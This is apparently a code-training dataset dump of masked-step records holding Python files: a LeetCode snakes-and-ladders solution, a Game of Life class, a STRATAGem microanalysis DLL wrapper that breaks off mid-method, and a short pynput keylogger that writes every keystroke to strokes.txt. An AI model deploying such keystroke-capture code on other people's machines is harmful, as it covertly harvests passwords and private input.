"step-5": "#\n# @lc app=leetcode.cn id=909 lang=python3\n#\n# [909] 蛇梯棋\n#\n\n# @lc code=start\nfrom typing import List\nclass Solution:\n def snakesAndLadders(self, board: List[List[int]]) -> int:\n N = len(board)\n def get_pos(num):\n r = (num-1) // N\n c = (num-1) % N\n c = c if ((r+1) & 1) else (N-1 - c) \n r = N-1 - r\n return r, c\n # r, c = get_pos(20)\n # print(r, c)\n def skip(num):\n r, c = get_pos(num)\n if board[r][c] != -1:\n return board[r][c]\n else:\n return num\n from collections import deque\n dq = deque([1])\n vis = set([1])\n step = -1\n while dq:\n sz = len(dq)\n step += 1\n for _ in range(sz):\n node = dq.popleft()\n if (node == N*N):\n return step\n for i in range(1, 7):\n new_node = node + i\n if (new_node > N*N):\n continue\n new_node = skip(new_node)\n if (new_node not in vis):\n dq.append(new_node)\n vis.add(new_node)\n\n return -1\n\n\"\"\" 21-06-27 每日一题打卡BFS\nAccepted\n211/211 cases passed (100 ms)\nYour runtime beats 99.08 % of python3 submissions\nYour memory usage beats 14.68 % of python3 submissions (15.1 MB)\n\"\"\"\n\n# board = [[-1,-1,-1,-1,-1,-1],\n# [-1,-1,-1,-1,-1,-1],\n# [-1,-1,-1,-1,-1,-1],\n# [-1,35,-1,-1,13,-1],\n# [-1,-1,-1,-1,-1,-1],\n# [-1,15,-1,-1,-1,-1]]\n\n# s = Solution().snakesAndLadders(board)\n# print(s)\n\n# @lc code=end\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pynput import keyboard
# list of chars entered by the user
list = []
number_of_chars = 0
# if entered chars go above MAX LENGTH they will be written inside a file
MAX_LENGTH = 300
def on_press(key):
global number_of_chars
global list
list.append(key)
number_of_chars+=1
if number_of_chars>=MAX_LENGTH:
write_in_file()
list.clear()
number_of_chars = 0
def on_release(key):
if key == keyboard.Key.esc:
# if the user exist write all the contents inside the file
write_in_file()
return False
def write_in_file():
file = open("strokes.txt","a")
for k in list:
file.writelines("{}\n".format(str(k)))
file.close()
# erases contents of the file when the program is runned
open("strokes.txt","w").close()
with keyboard.Listener(on_press = on_press,on_release=on_release) as listener:
listener.join()
|
normal
|
{
"blob_id": "e60fcf19560b4826577797c8ae8b626ff984dcfd",
"index": 6923,
"step-1": "<mask token>\n\n\ndef on_release(key):\n if key == keyboard.Key.esc:\n write_in_file()\n return False\n\n\ndef write_in_file():\n file = open('strokes.txt', 'a')\n for k in list:\n file.writelines('{}\\n'.format(str(k)))\n file.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef on_press(key):\n global number_of_chars\n global list\n list.append(key)\n number_of_chars += 1\n if number_of_chars >= MAX_LENGTH:\n write_in_file()\n list.clear()\n number_of_chars = 0\n\n\ndef on_release(key):\n if key == keyboard.Key.esc:\n write_in_file()\n return False\n\n\ndef write_in_file():\n file = open('strokes.txt', 'a')\n for k in list:\n file.writelines('{}\\n'.format(str(k)))\n file.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef on_press(key):\n global number_of_chars\n global list\n list.append(key)\n number_of_chars += 1\n if number_of_chars >= MAX_LENGTH:\n write_in_file()\n list.clear()\n number_of_chars = 0\n\n\ndef on_release(key):\n if key == keyboard.Key.esc:\n write_in_file()\n return False\n\n\ndef write_in_file():\n file = open('strokes.txt', 'a')\n for k in list:\n file.writelines('{}\\n'.format(str(k)))\n file.close()\n\n\nopen('strokes.txt', 'w').close()\nwith keyboard.Listener(on_press=on_press, on_release=on_release) as listener:\n listener.join()\n",
"step-4": "<mask token>\nlist = []\nnumber_of_chars = 0\nMAX_LENGTH = 300\n\n\ndef on_press(key):\n global number_of_chars\n global list\n list.append(key)\n number_of_chars += 1\n if number_of_chars >= MAX_LENGTH:\n write_in_file()\n list.clear()\n number_of_chars = 0\n\n\ndef on_release(key):\n if key == keyboard.Key.esc:\n write_in_file()\n return False\n\n\ndef write_in_file():\n file = open('strokes.txt', 'a')\n for k in list:\n file.writelines('{}\\n'.format(str(k)))\n file.close()\n\n\nopen('strokes.txt', 'w').close()\nwith keyboard.Listener(on_press=on_press, on_release=on_release) as listener:\n listener.join()\n",
"step-5": "from pynput import keyboard\n\n# list of chars entered by the user\nlist = []\nnumber_of_chars = 0\n# if entered chars go above MAX LENGTH they will be written inside a file\nMAX_LENGTH = 300\n\ndef on_press(key):\n global number_of_chars\n global list\n \n list.append(key)\n number_of_chars+=1\n\n\n if number_of_chars>=MAX_LENGTH:\n write_in_file()\n list.clear()\n number_of_chars = 0\n\ndef on_release(key):\n if key == keyboard.Key.esc:\n # if the user exist write all the contents inside the file\n write_in_file()\n return False\n\ndef write_in_file():\n file = open(\"strokes.txt\",\"a\")\n for k in list:\n file.writelines(\"{}\\n\".format(str(k)))\n file.close()\n\n\n\n# erases contents of the file when the program is runned\nopen(\"strokes.txt\",\"w\").close()\n\nwith keyboard.Listener(on_press = on_press,on_release=on_release) as listener:\n listener.join()",
"step-ids": [
2,
3,
4,
5,
7
]
}
|
[
2,
3,
4,
5,
7
] |
class GameOfLife:
@staticmethod
def simulate(board):
for row in range(len(board)):
for col in range(len(board[0])):
ones = GameOfLife.countOnes(board, row, col)
if board[row][col] and (ones == 2 or ones == 3):
board[row][col] |= 2
elif not board[row][col] and ones == 3:
board[row][col] |= 2
for row in range(len(board)):
for col in range(len(board[0])):
board[row][col] >>= 1
@staticmethod
def countOnes(board, row, col):
total = 0
total += GameOfLife.isOne(board, row - 1, col - 1)
total += GameOfLife.isOne(board, row - 1, col)
total += GameOfLife.isOne(board, row - 1, col + 1)
total += GameOfLife.isOne(board, row, col - 1)
total += GameOfLife.isOne(board, row, col + 1)
total += GameOfLife.isOne(board, row + 1, col - 1)
total += GameOfLife.isOne(board, row + 1, col)
total += GameOfLife.isOne(board, row + 1, col + 1)
return total
@staticmethod
def isOne(board, row, col):
if row >= len(board) or row < 0:
return 0
        if col >= len(board[0]) or col < 0:  # bound by row width so rectangular boards work too
return 0
return board[row][col] & 1
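
# A small illustrative run. The blinker pattern below is a conventional Game of
# Life example, not something taken from this class; it assumes the in-place
# encoding used above (bit 0 = current state, bit 1 = next state).
if __name__ == '__main__':
    blinker = [[0, 0, 0, 0, 0],
               [0, 0, 1, 0, 0],
               [0, 0, 1, 0, 0],
               [0, 0, 1, 0, 0],
               [0, 0, 0, 0, 0]]
    GameOfLife.simulate(blinker)  # one step: the vertical bar becomes horizontal
    for row in blinker:
        print(row)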
|
normal
|
{
"blob_id": "862c5794a4da794678de419f053ae15b11bca6e7",
"index": 7453,
"step-1": "class GameOfLife:\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "class GameOfLife:\n\n @staticmethod\n def simulate(board):\n for row in range(len(board)):\n for col in range(len(board[0])):\n ones = GameOfLife.countOnes(board, row, col)\n if board[row][col] and (ones == 2 or ones == 3):\n board[row][col] |= 2\n elif not board[row][col] and ones == 3:\n board[row][col] |= 2\n for row in range(len(board)):\n for col in range(len(board[0])):\n board[row][col] >>= 1\n <mask token>\n <mask token>\n",
"step-3": "class GameOfLife:\n\n @staticmethod\n def simulate(board):\n for row in range(len(board)):\n for col in range(len(board[0])):\n ones = GameOfLife.countOnes(board, row, col)\n if board[row][col] and (ones == 2 or ones == 3):\n board[row][col] |= 2\n elif not board[row][col] and ones == 3:\n board[row][col] |= 2\n for row in range(len(board)):\n for col in range(len(board[0])):\n board[row][col] >>= 1\n\n @staticmethod\n def countOnes(board, row, col):\n total = 0\n total += GameOfLife.isOne(board, row - 1, col - 1)\n total += GameOfLife.isOne(board, row - 1, col)\n total += GameOfLife.isOne(board, row - 1, col + 1)\n total += GameOfLife.isOne(board, row, col - 1)\n total += GameOfLife.isOne(board, row, col + 1)\n total += GameOfLife.isOne(board, row + 1, col - 1)\n total += GameOfLife.isOne(board, row + 1, col)\n total += GameOfLife.isOne(board, row + 1, col + 1)\n return total\n <mask token>\n",
"step-4": "class GameOfLife:\n\n @staticmethod\n def simulate(board):\n for row in range(len(board)):\n for col in range(len(board[0])):\n ones = GameOfLife.countOnes(board, row, col)\n if board[row][col] and (ones == 2 or ones == 3):\n board[row][col] |= 2\n elif not board[row][col] and ones == 3:\n board[row][col] |= 2\n for row in range(len(board)):\n for col in range(len(board[0])):\n board[row][col] >>= 1\n\n @staticmethod\n def countOnes(board, row, col):\n total = 0\n total += GameOfLife.isOne(board, row - 1, col - 1)\n total += GameOfLife.isOne(board, row - 1, col)\n total += GameOfLife.isOne(board, row - 1, col + 1)\n total += GameOfLife.isOne(board, row, col - 1)\n total += GameOfLife.isOne(board, row, col + 1)\n total += GameOfLife.isOne(board, row + 1, col - 1)\n total += GameOfLife.isOne(board, row + 1, col)\n total += GameOfLife.isOne(board, row + 1, col + 1)\n return total\n\n @staticmethod\n def isOne(board, row, col):\n if row >= len(board) or row < 0:\n return 0\n if col >= len(board) or col < 0:\n return 0\n return board[row][col] & 1\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
"""
Main class of the interface.
It setups the experimental parameters such as the :class:`.Experiment`'s and
:class:`.Sample`, geometry (:attr:`geometry <Stratagem.geometry>`), type of
:math:`\\phi(\\rho z)` model (:attr:`prz_mode <Stratagem.prz_mode>`) and
fluorescence mode (:attr:`fluorescence <Stratagem.fluorescence>`).
"""
# Standard library modules.
import os
import ctypes as c
import logging
logger = logging.getLogger(__name__)
from operator import attrgetter
import random
import string
import functools
try:
import winreg
except ImportError:
try:
import _winreg as winreg
except ImportError:
class winreg:
HKEY_CURRENT_USER = None
class _PyHKEY(object):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
pass
def OpenKey(self, key, sub_key, res, sam):
return self._PyHKEY()
def QueryValueEx(self, key, value_name):
return None
# Third party modules.
# Local modules.
from stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF
from stratagemtools.experiment import Experiment, LINE_KA
from stratagemtools.element_properties import \
atomic_mass_kg_mol, mass_density_kg_m3
# Globals and constants variables.
_REGISTRY_KEY = "Software\SAMx\Stratagem\Configuration"
_REGISTRY_VALUENAME = 'InstallOEMDirectory'
PRZMODE_XPP = 0
""":math:`\\phi(\\rho z)` from XPP"""
PRZMODE_PAP = 1
""":math:`\\phi(\\rho z)` from PAP"""
PRZMODE_GAU = 2
""":math:`\\phi(\\rho z)` *unknown*, possibly two Gaussians"""
FLUORESCENCE_NONE = 0
"""No fluorescence"""
FLUORESCENCE_LINE = 1
"""Only characteristic fluorescence"""
FLUORESCENCE_LINE_CONT = 2
"""Characteristic and Bremsstrahlung fluorescence"""
_CONCENTRATION_FLAG_KNOWN = 0
_CONCENTRATION_FLAG_UNKNOWN = 1
_CONCENTRATION_FLAG_STOICHIOMETRIC = 2
_CONCENTRATION_FLAG_TRACE = 3
_CONCENTRATION_FLAG_DIFFERENCE = 4
class StratagemError(Exception):
"""
Exception raised for all errors related to the STRATAGem interface.
"""
pass
def _check_key(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
if self._key is None:
raise StratagemError('Not initialize. Call init().')
return method(self, *args, **kwargs)
return wrapper
class Stratagem:
"""
Main interface establishing a connection to the STRATAGem OEM interface and
perform calculations using SAMx's STRATAGem.
It is highly recommended to use :class:`Stratagem` as a context manager
(i.e. ``with`` statement) to ensure that the connection to the DLL is
properly closed.
For instance::
>>> with Stratagem() as strata:
... strata.prz_mode = PRZMODE_XPP
Otherwise the following series of method must be called::
>>> strata = Stratagem()
>>> strata.init()
>>> strata.prz_mode = PRZMODE_XPP
>>> strata.close()
"""
def __init__(self, dll_path=None, display_error=True):
"""
:arg dll_path: complete path to the location of ``stratadllogger.dll``
(optional). If ``None``, the path is found in the Windows registry
under ``Software\SAMx\Stratagem\Configuration``. If the DLL is not
found a :class:`StratagemError` is raised.
:type dll_path: :class:`str`
:arg display_error: whether to display a message dialog on error
:type display_error: :class:`bool`
"""
if dll_path is None:
with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY) as key: #@UndefinedVariable
basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0] #@UndefinedVariable
dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')
cwd = os.getcwd()
try:
logger.debug("dll=%s", dll_path)
self._lib = c.WinDLL(dll_path)
finally:
os.chdir(cwd) # Change back to real cwd
logger.debug("StEnableErrorDisplay(%r)", display_error)
self._lib.StEnableErrorDisplay(c.c_bool(display_error))
self._key = None
self._cwd = os.getcwd()
self._layers = {} # layer: index
self._substrate = None
self._experiments = {} # experiment: (element, line, kratio) indexes
self._tmpstandards = []
def __enter__(self):
self.init()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
def _stobjectnew(self, key=None, standard=False):
if key is None:
characters = string.ascii_lowercase
key = ''.join(random.choice(characters) for _ in range(8))
key = key.encode('ascii')
if not isinstance(key, c.c_byte):
key = c.create_string_buffer(key)
bnormal_ = c.c_bool(not standard)
iniflags_ = c.c_int(0)
logger.debug("StObjectNew(key, %r, %i)", not standard, 0)
if not self._lib.StObjectNew(key, bnormal_, iniflags_):
self._raise_error("Cannot create object")
return key
def _raise_error(self, alternate=''):
"""
Raises a :class:`StratagemError`.
The error code and message of known errors are retrieved from STRATAGem.
If this is not possible, *alternate* is used as the error message.
"""
errnum_ = c.c_ulong()
errtype_ = c.c_int()
self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))
if errnum_.value != 0:
if errtype_.value == 0:
buf_ = c.create_string_buffer(256)
self._lib.StGetMsg(errnum_, buf_, 256)
raise StratagemError(buf_.value.decode('ascii'))
elif errtype_.value == 1:
raise c.WinError(errtype_.value)
else:
raise StratagemError('Error %i' % errnum_.value)
else:
raise StratagemError(alternate)
def init(self):
"""
        Initializes and sets up STRATAGem.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
raise RuntimeError('Already initialized. Call close() first.')
self._key = self._stobjectnew()
self._cwd = os.getcwd()
self.reset()
def close(self):
"""
Closes the connection to the STRATAGem DLL.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
logger.debug('StObjectDelete(key)')
self._lib.StObjectDelete(self._key)
self._key = None
for filepath in self._tmpstandards:
os.remove(filepath)
logger.debug('Remove temporary standard: %s', filepath)
self.reset()
def reset(self):
"""
        Resets all parameters to the defaults and removes all experiments and the sample.
"""
if self._key:
self._lib.StObjectReset(self._key)
os.chdir(self._cwd)
self._layers.clear() # layer: index
self._substrate = None
self._experiments.clear() # analyzed experiments
self._tmpstandards.clear()
@_check_key
def set_sample(self, sample):
"""
Sets the sample, which will be used in all subsequent calculations.
Note that only one sample can be defined.
:arg sample: sample definition
:type sample: :class:`Sample`
"""
self.reset()
for layer in sample.layers:
index = self._add_layer(layer, substrate=False)
self._layers.setdefault(layer, index)
index = self._add_layer(sample.substrate, substrate=True)
self._substrate = (sample.substrate, index)
@_check_key
def get_sample(self):
"""
Returns the current sample.
It can correspond to the sample defined by :meth:`set_sample` or the
sample resulting from the computations (see :meth:`compute`).
.. note:: a new sample is returned every time this method is called
:return: current sample
:rtype: :class:`Sample`
"""
sample = Sample(self._substrate[0].composition)
for layer in self._layers:
sample.add_layer(layer.composition, layer.thickness_m,
layer.mass_thickness_kg_m2, layer.density_kg_m3)
return sample
sample = property(get_sample, set_sample, doc="Property to set/get sample")
def _add_layer(self, layer, substrate=False, key=None):
"""
Internal method to add a layer from top to bottom.
The last layer added is considered as the substrate.
:arg layer: layer
:type layer: :class:`.Layer`
:return: index of the layer
"""
if key is None:
key = self._key
logger.debug("StSdAddLayer(key)")
ilayer_ = self._lib.StSdGetNbLayers(key)
logger.debug("StSdAddLayer(key, %i)", ilayer_)
if not self._lib.StSdAddLayer(key, ilayer_):
self._raise_error("Cannot add layer")
for i, value in enumerate(layer.composition.items()):
ielt_ = c.c_int(i)
logger.debug("StSdAddElt(key, %i, %i)", ilayer_, i)
if not self._lib.StSdAddElt(key, ilayer_, ielt_):
self._raise_error("Cannot add element")
z, wf = value
nra_ = c.c_int(z)
logger.debug("StSdSetNrAtom(key, %i, %i, %i)", ilayer_, i, z)
if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):
self._raise_error("Cannot set atomic number")
if wf is None or wf == CONC_UNKNOWN:
flag = _CONCENTRATION_FLAG_UNKNOWN
elif wf == CONC_DIFF:
flag = _CONCENTRATION_FLAG_DIFFERENCE
else:
flag = _CONCENTRATION_FLAG_KNOWN
wf_ = c.c_double(wf)
logger.debug("StSdSetConc(key, %i, %i, %f)", ilayer_, i, wf)
if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):
self._raise_error("Cannot set concentration")
logger.debug("StSdSetConcFlag(key, %i, %i, %i)", ilayer_, i, flag)
if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)):
self._raise_error("Cannot set concentration flag")
if not substrate:
thick_known = layer.is_thickness_known()
thick_known_ = c.c_bool(thick_known)
if layer.is_density_known():
density = layer.density_kg_m3 / 1e3 # g/cm3
else:
density = 10.0
density_ = c.c_double(density)
if thick_known:
thickness = layer.thickness_m * 1e10 # Angstroms
mass_thickness = layer.mass_thickness_kg_m2 * 0.1 # g/cm2
else:
thickness = 0.0
mass_thickness = 0.0
thickness_ = c.c_double(thickness)
mass_thickness_ = c.c_double(mass_thickness)
logger.debug("StSdSetThick(key, %i, %r, %d, %d, %d)", ilayer_,
thick_known, mass_thickness, thickness, density)
if not self._lib.StSdSetThick(key, ilayer_, thick_known_,
mass_thickness_, thickness_, density_):
self._raise_error("Cannot set thickness")
return int(ilayer_)
def _create_standard(self, standard):
"""
Internal method to create a new object defining the standard
:class:`.Sample`.
"""
# Create new object
key_ = self._stobjectnew(standard=True)
# Set sample
for layer in standard.layers:
self._add_layer(layer, substrate=False, key=key_)
self._add_layer(standard.substrate, substrate=True, key=key_)
# Save
filename = key_.value.decode('ascii') + '.tfs'
filepath = os.path.join(self.get_standard_directory(), filename)
filepath_ = c.create_string_buffer(filepath.encode('ascii'))
logger.debug('StObjectWriteFile(key, %s)', filepath)
if not self._lib.StObjectWriteFile(key_, filepath_):
self._raise_error("Cannot save standard")
# Delete object
self._lib.StObjectDelete(key_)
self._tmpstandards.append(filepath)
return filepath
@_check_key
def add_experiment(self, experiment):
"""
Adds an experiment, i.e. measurements of k-ratio at different energies.
.. hint:: Use :meth:`reset` method to remove defined experiments.
:arg experiment: experiment
:type experiment: :class:`Experiment`
"""
nra_ = c.c_int(experiment.z)
klm_ = c.c_int(experiment.line)
hv_ = c.c_double(experiment.energy_eV / 1e3)
ielt_ = c.c_int()
iline_ = c.c_int()
iexpk_ = c.c_int()
logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z, experiment.line)
if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_,
c.byref(ielt_), c.byref(iline_), c.byref(iexpk_)):
self._raise_error("Cannot add atomic number and line")
standard = experiment.standard
if isinstance(standard, Sample):
standard = self._create_standard(standard)
standard_ = c.create_string_buffer(standard.encode('ascii'))
logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value, iline_.value, klm_.value, standard)
if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_):
self._raise_error("Cannot set standard")
analyzed = experiment.is_analyzed()
analyzed_ = c.c_bool(analyzed)
logger.debug("StEdSetAnalyzedFlag(key, %i, %r)", ielt_.value, analyzed)
if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):
self._raise_error("Cannot add experiment analyzed flag")
kratio_ = c.c_double(experiment.kratio)
logger.debug("StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)",
ielt_.value, iline_.value, iexpk_.value,
experiment.energy_eV / 1e3, experiment.energy_eV / 1e3,
experiment.kratio)
if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_,
hv_, hv_, kratio_, c.c_double(0.0),
c.c_int(2)):
self._raise_error("Cannot set experiment k-ratio")
if experiment.is_analyzed():
indexes = (ielt_.value, iline_.value, iexpk_.value)
self._experiments.setdefault(experiment, indexes)
@_check_key
def add_experiments(self, *exps):
"""
Adds several experiments::
>>> strata.add_experiments(exp1, exp2, exp3)
"""
for exp in exps:
self.add_experiment(exp)
def get_experiments(self):
"""
Returns a :class:`tuple` of all defined experiments.
:rtype: :class:`tuple`
"""
return tuple(self._experiments.keys())
@_check_key
def set_geometry(self, toa, tilt, azimuth):
"""
Sets the geometry.
:arg toa: take off angle (in radians)
:arg tilt: tilt angle (in radians)
:arg azimuth: azimuthal angle (in radians)
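
        Example for a 40 degree take-off angle with no tilt (values are
        illustrative)::

            >>> import math
            >>> strata.set_geometry(math.radians(40), 0.0, 0.0)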
"""
toa_ = c.c_double(toa)
tilt_ = c.c_double(tilt)
azimuth_ = c.c_double(azimuth)
logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)
if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):
self._raise_error("Cannot set geometry parameters")
@_check_key
def get_geometry(self):
"""
Returns the geometry.
:return: take off angle (in radians), tilt angle (in radians),
azimuthal angle (in radians)
"""
toa_ = c.c_double()
tilt_ = c.c_double()
azimuth_ = c.c_double()
logger.debug('StGetGeomParams(key)')
if not self._lib.StGetGeomParams(self._key, c.byref(toa_),
c.byref(tilt_), c.byref(azimuth_)):
self._raise_error("Cannot get geometry parameters")
return toa_.value, tilt_.value, azimuth_.value
geometry = property(get_geometry, doc='Property to get geometry')
@_check_key
def set_prz_mode(self, mode):
"""
Sets the type of model to use for the :math:`\\phi(\\rho z)`.
:arg mode: type of model, either
* :data:`PRZMODE_XPP`
* :data:`PRZMODE_PAP`
* :data:`PRZMODE_GAU`
:type mode: :class:`int`
"""
mode_ = c.c_int(mode)
logger.debug('StSetPrzMode(%i)', mode)
self._lib.StSetPrzMode(mode_)
@_check_key
def get_prz_mode(self):
"""
Returns the type of model to use for the :math:`\\phi(\\rho z)`.
:return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or
:data:`PRZMODE_GAU`
:rtype: :class:`int`
"""
return self._lib.StGetPrzMode()
prz_mode = property(get_prz_mode, set_prz_mode,
doc='Property to get/set prz mode')
@_check_key
def set_fluorescence(self, flag):
"""
Sets the fluorescence flag.
:arg flag: either
* :data:`FLUORESCENCE_NONE`
* :data:`FLUORESCENCE_LINE`
* :data:`FLUORESCENCE_LINE_CONT`
:type flag: :class:`int`
"""
flag_ = c.c_int(flag)
logger.debug('StSetFluorFlg(%i)', flag)
self._lib.StSetFluorFlg(flag_)
@_check_key
def get_fluorescence(self):
"""
Returns the fluorescence flag.
:return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`
or :data:`FLUORESCENCE_LINE_CONT`
:rtype: :class:`int`
"""
return self._lib.StGetFluorFlg()
fluorescence = property(get_fluorescence, set_fluorescence,
doc='Property to get/set fluorescence')
@_check_key
def set_standard_directory(self, dirpath):
"""
Sets the directory where standard files are stored.
:arg dirpath: path to directory
:type dirpath: :class:`str`
"""
dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))
self._lib.StSetDirectory(c.c_int(1), dirpath_)
@_check_key
def get_standard_directory(self):
"""
Returns the directory where standard files are stored.
:rtype: :class:`str`
"""
dirpath = (c.c_char * 256)()
self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)
return dirpath.value.decode('ascii')
standard_directory = property(get_standard_directory, set_standard_directory,
doc='Property to get/set standard directory')
@_check_key
def compute_kratio_vs_thickness(self, layer,
thickness_low_m, thickness_high_m, step):
"""
Computes the variation of the k-ratio as a function of the thickness
for a layer.
:arg layer: layer of a sample (must have been previously added)
:type layer: :class:`.Layer`
:arg thickness_low_m: lower limit of the thickness in meters
:type thickness_low_m: :class:`float`
:arg thickness_high_m: upper limit of the thickness in meters
:type thickness_high_m: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of thicknesses
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each thickness
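
        Example, assuming ``layer`` is part of the previously defined sample
        (values are illustrative)::

            >>> thicknesses, kratios = strata.compute_kratio_vs_thickness(
            ...     layer, 10e-9, 100e-9, 10)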
"""
logger.debug('StSetKvsThicknessUnit(2)')
self._lib.StSetKvsThicknessUnit(2) # unit in nm
if layer not in self._layers:
raise ValueError("Unknown layer")
ilayer = self._layers[layer]
ilayer_ = c.c_int(ilayer)
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
# Compute
low_ = c.c_double(thickness_low_m * 1e9)
high_ = c.c_double(thickness_high_m * 1e9)
logger.debug('StComputeKvsThickness(key, %i, %f, %f)',
ilayer, thickness_low_m * 1e9, thickness_high_m * 1e9)
if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_):
self._raise_error("Cannot compute k-ratio vs thickness")
# Fetch results
thicknesses = []
kratios = {}
thick_ = c.c_double()
k_ = c.c_double()
for i in range(step + 1):
i_ = c.c_int(i)
if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):
self._raise_error("Cannot get thickness")
thicknesses.append(thick_.value)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
iHv_ = c.c_int(indexes[2])
if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,
iHv_, c.byref(k_)):
self._raise_error("Cannot get k-ratio")
kratios.setdefault(experiment, []).append(k_.value)
return thicknesses, kratios
@_check_key
def compute_kratio_vs_energy(self, energy_high_eV, step):
"""
Computes the variation of the k-ratio as a function of the incident
energy.
        Note that the computation runs from 0 keV up to the specified energy.
        :arg energy_high_eV: upper limit of the energy in electronvolts
:type energy_high_eV: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
        * :class:`list` of energies in kiloelectronvolts
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each energy
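
        Example for a sweep up to 20 keV in 10 steps (illustrative)::

            >>> energies, kratios = strata.compute_kratio_vs_energy(20e3, 10)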
"""
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
energy_ = c.c_double(energy_high_eV / 1e3)
logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1e3,))
self._lib.StSetMaxHV(energy_)
# Compute
logger.debug('StComputeKvsHV(key)')
if not self._lib.StComputeKvsHV(self._key):
self._raise_error("Cannot compute k-ratio vs energy")
# Fetch results
energies = []
kratios = {}
k_ = c.c_double()
bHV_ = c.c_bool(True)
increment = float(energy_high_eV / 1e3) / step
for i in range(step + 1):
hv = i * increment
hv_ = c.c_double(hv)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_, bHV_, c.byref(k_)):
self._raise_error("Cannot get k-ratio")
kratios.setdefault(experiment, []).append(k_.value)
energies.append(hv)
return energies, kratios
@_check_key
def compute_kratios(self):
"""
Computes the k-ratios of the different experiments.
:return: :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are k-ratios
(:class:`float`).
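
        Example (illustrative)::

            >>> kratios = strata.compute_kratios()
            >>> for experiment, kratio in kratios.items():
            ...     print(experiment, kratio)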
"""
if len(self._layers) == 0:
return self._compute_kratios_substrate()
else:
return self._compute_kratios_multilayers()
@_check_key
def _compute_kratios_multilayers(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_thickness`.
"""
for i, layer in enumerate(self._layers.keys()):
if not layer.is_thickness_known():
raise ValueError("Thickness of layer %i is unknown" % i)
# Compute
layer = list(self._layers.keys())[0]
thickness_low_m = layer.thickness_m
thickness_high_m = layer.thickness_m * 10
step = 1
_thicknesses, kratios = \
self.compute_kratio_vs_thickness(layer, thickness_low_m,
thickness_high_m, step)
# Reorganize results
output = {}
for experiment, kratio in kratios.items():
output.setdefault(experiment, kratio[0])
return output
@_check_key
def _compute_kratios_substrate(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_energy`.
"""
output = {}
step = 2
for experiment in self._experiments:
energy_high_eV = experiment.energy_eV
_energies, kratios = \
self.compute_kratio_vs_energy(energy_high_eV, step)
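            # the last point of the 0 keV -> energy_high_eV sweep corresponds
            # to the experiment's beam energy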
kratio = kratios[experiment][-1]
            if kratio < 0:  # Work around a STRATAGem bug where some energies fail
                logger.warning("STRATAGem returned a negative k-ratio, retrying with energy + 1 eV")
_energies, kratios = \
self.compute_kratio_vs_energy(energy_high_eV + 1.0, step)
kratio = kratios[experiment][-1]
output.setdefault(experiment, kratio)
return output
@_check_key
def compute(self, iteration_max=50):
"""
Computes the unknown composition(s) and thickness(es) in the specified
sample.
        :arg iteration_max: maximum number of iterations of the solver
(default: 50)
:type iteration_max: :class:`int`
:return: calculated sample
:rtype: :class:`.Sample`
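
        Typical usage (illustrative; the sample and experiments must have been
        defined beforehand)::

            >>> strata.set_sample(sample)
            >>> strata.add_experiments(exp1, exp2)
            >>> newsample = strata.compute()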
"""
# Add missing experiments
zs = set(exp.z for exp in self._experiments.keys())
for layer in list(self._layers.keys()) + [self._substrate[0]]:
for z, wf in layer.composition.items():
if z in zs:
continue
if wf is None:
continue
logger.debug('Added dummy experiment for z=%i', z)
exp = Experiment(z, LINE_KA, 0.0, analyzed=False) # dummy
self.add_experiment(exp)
# Set iteration maximum
iteration_max_ = c.c_int(iteration_max)
logger.debug('StSetMaxNbIter(%i)', iteration_max)
self._lib.StSetMaxNbIter(iteration_max_)
# Compute
